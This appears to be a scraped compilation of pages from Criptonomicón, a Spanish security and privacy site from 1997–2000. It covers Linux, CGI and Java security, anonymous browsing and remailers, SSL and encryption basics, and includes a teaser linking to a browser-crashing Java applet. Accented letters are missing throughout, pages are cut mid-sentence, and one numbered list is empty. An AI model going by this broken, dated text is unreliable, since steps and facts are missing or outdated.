Académique Documents
Professionnel Documents
Culture Documents
Te sientes observado? Notas unos ojos que siguen todos tus movimientos cuando mueves el ratn?
A veces uno se siente as cuando navega por la Red.
Puedes protegerte. Existen tcnicas para preservar tu privacidad, para asegurar tus secretos, para que
ests a salvo.
Te propongo un viaje por el mundo de la criptografa y la seguridad en Internet.
Quieres acompaarme? Sgueme, abre conmigo las pginas del Criptonomicn.
Suscripcin gratis
Tu e-mail
Suscribir
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Agujeros
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC.
Para informacin sobre privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Para sugerencias, comentarios o quejas, acuda al libro de visitas. Para contribuir al Criptonomicn,
lea la pgina de contribuciones. Infrmese sobre cmo recibir gratis el Boletn del Criptonomicn
en la pgina de suscripcin.
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Suscripcin gratis
Seguridad
Linux
Cmo suscribirse
Intimidad?
Artculos
Navegacin segura
Control de acceso
Suscripcin
CGI
Java
JavaScript
Cancelacin
Cookies
Crashes
Agujeros
Spam
Nmeros atrasados
Que te acabas de suscribir y te gustara leer los boletines anteriores? Ningn
problema, aqu los tienes, ordenados por fecha de publicacin. Eso s, aqu
aparecern algo ms tarde que el boletn distribuido por suscripcin, por lo que
algunas noticias podran quedar desfasadas.
Boletines #1-10 (en formato ZIP)
Remailers
Anonimato
Correo seguro
Web seguro
Libro de Visitas
Puedo colaborar?
Claro que s. El boletn est abierto a todo aquel que, poseyendo un conocimiento
profundo sobre alguno de los temas habitualmente tratados en este medio, desee
compartir con el resto de lectores sus conocimientos y experiencia. Los interesados
en participar en la seccin Hablan los expertos, pueden remitirme sus trabajos por
correo electrnico.
Asmismo, todos aquellos que queris expresar vuestros comentarios, opiniones y
pareceres sobre cualquier aspecto relacionado con el mundo de la criptografa y de la
seguridad en Internet, podis hacerlo escribindome por correo electrnico, para que
vuestras cartas aparezcan en la seccin Comentarios de los lectores.
Entre todos podemos trabajar por una Internet ms segura.
Firma PGP
Puedes obtener la clave pblica PGP del Criptonomicn para comprobar la firma en
los boletines a partir del nmero 36 inclusive.
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Intimidad?
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Nota: En Internet Explorer puede fallar el botn que te dice tu nombre y direccin de mquina. Si aparece localhost/127.0.0.1, es el
nombre y direccin IP asignado a la mquina local.
Susurros desde la Cripta
Con ello se expone a ser vctima de las ltimas plagas que han entrado en la escena
Referencias
Libro de Visitas
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Remailers
Anonimato
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Correo seguro
Web seguro
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Introduccin
Amenazas a la
seguridad
Servicios de
seguridad
Mecanismos de
seguridad
Gestin de claves
Navegacin segura
Control de acceso
CGI
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Seguridad en Linux
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema
de Archivos
Seguridad del Ncleo
Seguridad de Red
Seguridad en Linux
Consejos prcticos
Referencias
Libro de Visitas
difcil que se pueda conectar. Tambin puede configurar su sistema Linux sin
conexin a Internet, pero esto dificulta que pueda navegar por las webs. Si tiene un
sitio medio-grande, debera establecer una "Poltica de Seguridad" que indique qu
niveles requiere su sitio y qu medidas de evaluacin se realizan.
Los dos puntos principales de los que se tiene que dar cuenta cuando lea estas
pginas son:
Tenga cuidado con su sistema. Verifique los registros (logs) del sistema, tales
como /var/log/messages y no pierda de vista su sistema.
Tenga su sistema actualizado, estando seguro de que ha instalado las versiones
actuales de los programas y est al tanto de las nuevas alertas de seguridad.
Hacer esto le ayudar a conseguir que su sistema sea mucho ms seguro.
Nota: este documento est basado en parte, pero no es una traduccin literal, del Linux Security
HOWTO, de Kevin Fenzi y Dave Wreski.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Obtener un navegador
De todos los servicios que ofrece Internet, como correo
vlido
electrnico, grupos de noticias, canales de charla, transferencia de
ficheros, conexin remota a ordenadores, etc., sin duda alguna el
Configuracin segura de
que mayor crecimiento ha experimentado y mayor popularidad ha Netscape Communicator
cobrado entre los usuarios ha sido la World Wide Web.
Configuracin segura de
Paralelamente y siguiendo el tirn del mercado, el software de
Internet Explorer
navegacin ha ido evolucionando a un ritmo espectacular,
incorporando con cada nueva versin nuevas utilidades y posibilidades en una loca
carrera en la que cada navegador intenta dejar atrs a sus competidores.
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Control de acceso
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Nombres
Localizacin
JavaScript
Java
ASP
CGI
Agujeros
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Spam
Remailers
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Seguridad en CGI
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Seguridad en CGI
Cada vez que rellenamos un formulario y enviamos nuestros datos
o cada vez que utilizamos un buscador para encontrar
informacin, tanto si lo sabemos como si no, estamos haciendo
uso de programas CGI. En esta seccin del Criptonomicn se
describirn las amenazas a que estn expuestos los servidores
Web que incluyen aplicaciones CGI para llevar a cabo funciones
avanzadas de interaccin con el cliente, as como los propios
usuarios, que al enviar informacin posiblemente confidencial,
podran ver violada su intimidad si dicha informacin fuera
capturada por un atacante.
Qu es CGI
Riesgos de CGI
CGIs seguros
SSI
Consejos
Recursos
Se describirn a lo largo de estas pginas los riesgos y fallos ms
comunes, suministrndose abundantes consejos y ejemplos de cmo deben escribirse
los CGI y de cmo configurar el servidor para que esta clase de problemas no tenga
lugar.
Crashes
Agujeros
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Spam
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Remailers
Anonimato
Correo seguro
Web seguro
Seguridad en CGI
Consejos prcticos
Referencias
Libro de Visitas
Seguridad en Java
Suscripcin gratis
Intimidad?
Seguridad en Java
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Qu es Java
Barreras de seguridad
Prohibido
Agujeros
Lneas futuras
Sin embargo, la caracterstica ms atractiva de Java desde el punto Cmo firmar applets
de vista de Internet, sus applets, que se pueden ejecutar en
cualquier plataforma con cualquier sistema operativo, constituyen
Consejos
tambin su taln de Aquiles. Si desde cualquier pgina Web que
visitamos nos pueden enviar una applet que se ejecute en nuestro
Recursos
ordenador sin nuestro conocimiento, todo tipo de ataques podra
tener lugar: esas applets podran cifrar el contenido de nuestro
disco duro y luego su autor pedirnos una suma millonaria por entregarnos la clave;
podran introducirnos virus; podran robar todo tipo de informacin de nuestro
ordenador; podran explotar recursos de nuestro sistema, como ciclos de CPU, y un
largo etctera fcil de imaginar.
Agujeros
Spam
Remailers
Anonimato
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Correo seguro
Web seguro
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Seguridad en Java
Consejos prcticos
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Introduccin
JavaScript es un lenguaje de programacin desarrollado por
Netscape Corporation para su navegador Netscape Navigator 2.0,
para permitir la ejecucin de cdigo dentro de las pginas en
HTML. Microsoft posee su propia versin para su navegador
Internet Explorer, llamada JScript, pero que, salvo en algunos
detalles generalmente no demasiado importantes, resulta
compatible con los navegadores de Netscape. Gracias a los
programas (llamados guiones) escritos en este lenguaje y
embebidos en las pginas HTML, se pueden conseguir
interesantes efectos en las pginas web, comprobar la validez de la
entrada de formularios, abrir y cerrar ventanas, cambiar
dinmicamente el aspecto y los contenidos de una pgina, clculos
matemticos sencillos y mucho ms.
En este curso se pretende ofrecer una introduccin al lenguaje
JavaScript, que dote a sus lectores del conocimiento y
herramientas necesarios para empezar inmediatamente a utilizar
con eficacia guiones en sus pginas y mejorar as su contenido. Se
ofrecern ejemplos continuamente, junto con su cdigo fuente,
que puede ser tomado como punto de arranque para desarrollar
nuevas aplicaciones. Si desea obtener una gua completa sobre
este lenguaje, se recomienda al lector acudir a la pgina de
Netscape.
Validar formularios
Cambiar imgenes
dinmicamente
Clculos matemticos
Cookies
La barra de estado
Men de navegacin
Las personas que ya estn familiarizadas con HTML y especialmente con el lenguaje
de programacin C/C++ o Java, no encontrarn ninguna dificultad en seguir estas
lecciones, ya que JavaScript les resultar muy familiar. Se trata de un lenguaje
interpretado por el navegador del usuario que carga una pgina web (no compilado).
Est orientado a objetos, con una serie de limitaciones, cuyo cometido principal es
prevenir que se altere el sistema ficheros del cliente, por lo que no puede leer,
escribir, crear, borrar o listar ficheros (excepto cookies, de las que se hablar ms
adelante). Carece adems de primitivas de red, de manera que no puede establecer
conexin directa con otras mquinas (excepto enviar correo).
Libro de Visitas
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Qu son
Riesgos
Usos
Ejemplos
Crashes
Agujeros
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Spam
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Atencin!
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Te gustan los perros? Entonces no te pierdas a este perrito tan mono. Aunque te
advierto que te puede causar problemas. As que casi mejor que no lo visites, mira.
Bueno, t vers.
Este crash en Java se debe a la mente malvola de Joseph Ashwood. Que lo
disfrutes con salud!
Has guardado bien toda la informacin? Mira que podras perderlo todo. Si
no quieres arrepentirte, mejor no juegues con fuego.
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Intimidad?
Artculos
Navegacin segura
Control de acceso
CGI
Sabas que se puede utilizar tu ordenador para realizar clculos sin que t lo
sepas y enviar los resultados a travs de la Internet?
Aprende sobre el "Marcado de Datos" o Data Tainting, incorporado por
Netscape a JavaScript para evitar el robo y posterior difusin de informacin.
Quieres ver cmo se puede colar uno a travs de agujeros en CGI? De la
forma ms tonta se podra producir un desastre, a veces simplemente leyendo
una base de datos.
Seguridad
Linux
Java
JavaScript
Cookies
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Crashes
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
Introduccin
Por qu es malo
Cmo evitarlo
Truco casero
Recursos
CGI
JavaScript
Cookies
Crashes
Agujeros
Spam
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Remailers
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Dnde encontrarlos
Existen gran cantidad de repetidores de correo annimo en la Red, algunos de los
cuales permiten especificar una direccin de remite falsa, si bien la mayora informan
simplemente de que el mensaje fue enviado desde una direccin annima.
Private Idaho
Private Idaho es uno de los programas ms conocidos, con el valor aadido de
permitir el cifrado con PGP, caracterstica que todo buen repetidor debera
incorporar. De esta forma, envindole al repetidor el mensaje cifrado, con la
direccin del destinatario final igualmente cifrada, ni siquiera leyendo nuestros
correos al salir de la mquina se sabr a quin iban dirigidos. El repetidor descifrar
el mensaje y lo reexpedir al destino correcto, ya sin cifrar. La seguridad todava se
puede incrementar encadenando varios repetidores annimos.
Recursos en la Red
Remailer
MailObscuro
Annimos
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Navegacin annima
Suscripcin gratis
Navegacin annima
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
Cada vez que nos conectamos a un sitio Web, ste conoce automticamente nuestra
direccin IP, nombre de mquina, la pgina desde la que procedemos y a veces
incluso nuestra direccin de correo electrnico (quieres una demostracin?). De ah
en adelante, depender del servidor y de su poltica sobre intimidad lo que se har
con esa informacin. Con ayuda de las cookies se puede personalizar an ms la
informacin recabada acerca de los visitantes, registrando las pginas ms visitadas,
nuestras preferencias, dnde hemos estado, tiempo de la visita, etc. Con todos estos
elementos se pueden confeccionar perfiles de usuario cada vez ms exhaustivos y
detallados, con informacin muy personal que puede adquirir un valor considerable
en manos de casas publicitarias, y por la que se paga dinero.
Cookies
Por todo lo dicho, existen muchas situaciones en las que convendra navegar
annimamente sin dejar trazas de nuestra identidad, ya que con estos datos y
mediante programas de bsqueda de personas por su direccin de correo, se puede
obtener la identidad del cibernauta, incluyendo su nmero de telfono, direccin, y
ms. Por ejemplo, la red de DoubleClick fue capaz de identificar las preferencias
sobre vacaciones en cruceros de ms de 10 millones de personas en la Red. Gracias a
esa informacin, les enviaba anuncios a la medida de sus gustos (J. Voight, Beyond
the banner).
Crashes
CGI
Java
JavaScript
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Navegacin annima
Consejos prcticos
Referencias
Libro de Visitas
Ralentizan la navegacin.
Para un servicio ptimo hay que pagar.
Aaden a las pginas que visitamos banners con publicidad de sus
patrocinadores.
Servidores Proxy
Tambin se puede navegar annimamente a travs de un servidor proxy. La idea
bsica de un servidor proxy es actuar de pasarela (gateway) entre tu mquina o tu red
y la Internet. Normalmente se usan para llevar las peticiones del cliente a travs de
un cortafuegos (firewall): el proxy espera a una peticin desde dentro del cortafuegos
y la expide al servidor remoto en el exterior del cortafuegos, lee la respuesta y la
enva de vuelta al cliente. Dado que en la prctica todos los clientes en una subred
salen a travs del mismo proxy, tambin sirven para prestar servicios como cach de
documentos que son pedidos por muchos clientes. De esta forma se reduce el coste
de trfico de red ya que a menudo gran cantidad de documentos son recuperados
desde el cach local una vez que la peticin inicial ha sido hecha.
As pues, el servidor proxy acta de manera semejante a un anonimizador, ya que es
l el que recupera las pginas Web, en lugar de la persona que est navegando. Sin
embargo, presentan una serie de limitaciones frente a los anonimizadores:
No impiden que las cookies se sigan almacenando en el disco duro del usuario.
Normalmente todas las visitas quedan registradas en el proxy.
La direccin IP del servidor proxy por defecto refleja tu nombre de dominio o
por lo menos se acerca mucho.
Se puede navegar annimamente a travs de proxies en:
proxy1.emirates.net.ae, HTTP port 8080
Navegacin annima
Mi navegacin es annima?
Cmo puedo estar seguro de que cuando creo que navego annimamente, realmente
no estoy revelando mi direccin IP?
Ejecutando el siguiente programa CGI comprobars lo que se puede averiguar a
partir de tu direccin IP:
DNS
Recursos en la Red
Anonymous Surfing
iproxy
Annimos
Anonymous WWW
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
Navegacin annima
privacidad, por favor consulte la declaracin de poltica sobre privacidad Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones. Infrmese sobre cmo recibir gratis el Boletn del
Criptonomicn en la pgina de suscripcin..
Correo Seguro
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Agujeros
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Correo Seguro
Consejos prcticos
Referencias
Libro de Visitas
Web Seguro
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Introduccin
SSL
S-HTTP
SSL vs S-HTTP
Certificados
Existen sitios Web de la Administracin con informacin
confidencial sobre becas, datos de personal, nminas, etc. Resulta Cmo obterner uno
evidente que no interesa que esa informacin sea accesible a toda la Red, sino slo a
un pequeo nmero autorizado de usuarios. Por lo tanto, no vale con restringir el
acceso mediante claves de acceso o procedimientos similares, adems la informacin
que viaja hacia esos usuarios debe ir cifrada, para evitar escuchas.
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Recursos en la Red
Archive ssl-users@mincom.oz.au
Correo seguro
Web seguro
Web Seguro
Consejos prcticos
Referencias
S-HTTP
Libro de Visitas
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Bienvenido a la Cripta
Estas pginas recogen una seleccin de mis editoriales publicados en el Boletn del
Criptonomicn, tratando la ms candente actualidad en materia de criptografa y
seguridad.
Podrs informarte y formar tu opinin acerca de los ltimos avances en comercio
electrnico, acerca de la evolucin de SSL y SET, los retos a los que se enfrentan las
Administraciones Pblicas, legislacin y regulaciones sobre criptografa, y mucho
ms.
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Bucea por estas pginas y emppate de los conceptos de seguridad que te permitirn
saber qu est pasando en el mundo de las tecnologas de la informacin en los
albores del tercer milenio.
Artculos publicados
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
ganancias econmicas. Otros demandados por RIAA han sido Lycos (caso
perdido tambin) y Napster (probablemente, perdido tambin). Los
defensores de MP3 y la msica en Internet se preguntan, a cuntos ms
debe demandar la RIAA antes de darse cuenta de que su guerra est
perdida?
Libro de Visitas
Informacin adicional
Marcas de agua
SDMI
RIAA
SGAE
HispaMP3
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Remailers
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Consejos para
administradores
Consejos para
usuarios
Passwords
Actualizar y configurar
Escaneo de puertos
Dedos acusadores
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Di NO al spam
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Navega annimamente
Qu necesidad hay de dejar nuestra direccin IP all por donde pasemos?
Demasiadas cookies en nuestro disco duro? Aydate de la navegacin annima y
nadie sabr por dnde andas.
Qujate
Si recibes correo basura y puedes averiguar de quin procede o al menos su
proveedor de Internet, escrbeles quejndote.
Productos comerciales
Puedes encontrar una resea de productos en los nmeros atrasados del Boletn del
Criptonomicn, que se actualiza con una periodicidad aproximadamente semanal.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Cifrado
El cifrado consiste en transformar un texto en claro (inteligible
por todos) mediante un mecanismo de cifrado en un texto cifrado,
gracias a una informacin secreta o clave de cifrado. Se distinguen
dos mtodos generales de cifrado:
Linux
Cifrado simtrico
Navegacin segura
Introduccin
Cifrado
Firma digital
Proteger el correo
Control de acceso
CGI
Recursos
Java
sta es la opcin utilizada para cifrar el cuerpo del mensaje. Para ello se emplean
algoritmos como IDEA, RC5, DES, TRIPLE DES, etc.
JavaScript
Cifrado asimtrico
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Por otro lado, cuando se utiliza una pareja de claves para separar los procesos de
cifrado y descifrado, se dice que el criptosistema es asimtrico o de clave pblica.
Una clave, la privada, se mantiene secreta, mientras que la segunda clave, la pblica,
es conocida por todos. De forma general, las claves pblicas se utilizan para cifrar y
las privadas, para descifrar (v. figura). El sistema posee la propiedad de que a partir
del conocimiento de la clave pblica no es posible determinar la clave privada ni
descifrar el texto con ella cifrado. Los criptosistemas de clave pblica, aunque ms
lentos que los simtricos, resultan adecuados para los servicios de autenticacin,
distribucin de claves de sesin y firmas digitales, como se explicar posteriormente.
Se utilizan los algoritmos de RSA, Diffie-Hellman, etc.
En general, el cifrado asimtrico se emplea para cifrar las claves de sesin utilizadas
para cifrar el documento, de modo que puedan ser transmitidas sin peligro a travs de
la Red junto con el documento cifrado, para que en recepcin ste pueda ser
descifrado. La clave de sesin se cifra con la clave pblica del destinatario del
mensaje, que aparecer normalmente en una libreta de claves pblicas.
Web seguro
Referencias
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Libro de Visitas
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Firma digital
En principio, basta con cifrar un documento con la clave privada
Introduccin
para obtener una firma digital segura, puesto que nadie excepto el
poseedor de la clave privada puede hacerlo. Posteriormente,
Cifrado
cualquier persona podra descifrarlo con la clave pblica,
demostrndose as la identidad del firmante. En la prctica, debido
Firma digital
a que los algoritmos de clave pblica son muy ineficaces a la hora
de cifrar documentos largos, los protocolos de firma digital se
Proteger el correo
implementan junto con funciones unidireccionales de resumen
(hash), de manera que en vez de firmar un documento, se firma un
Recursos
resumen del mismo. Este mecanismo implica el cifrado, mediante
la clave privada del emisor, del resumen de los datos, que sern
transferidos junto con el mensaje. ste se procesa una vez en el receptor, para
verificar su integridad. Por lo tanto, los pasos del protocolo son (v. figura):
1.
2.
3.
4.
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Informacin adicional
Correo seguro
Web seguro
Para aprender ms sobre criptogafa de clave pblica, lee el artculo PKI o los
cimientos de una criptografa de clave pblica.
Referencias
Libro de Visitas
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Introduccin
Cifrado
Firma digital
Proteger el correo
Recursos
Java
JavaScript
Cookies
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Introduccin
Cifrado
Kriptpolis
Firma digital
Linux
Navegacin segura
Proteger el correo
Control de acceso
Recursos
Java
JavaScript
Mail 0bscur0
Todo sobre el PGP
Cookies
Agujeros
Spam
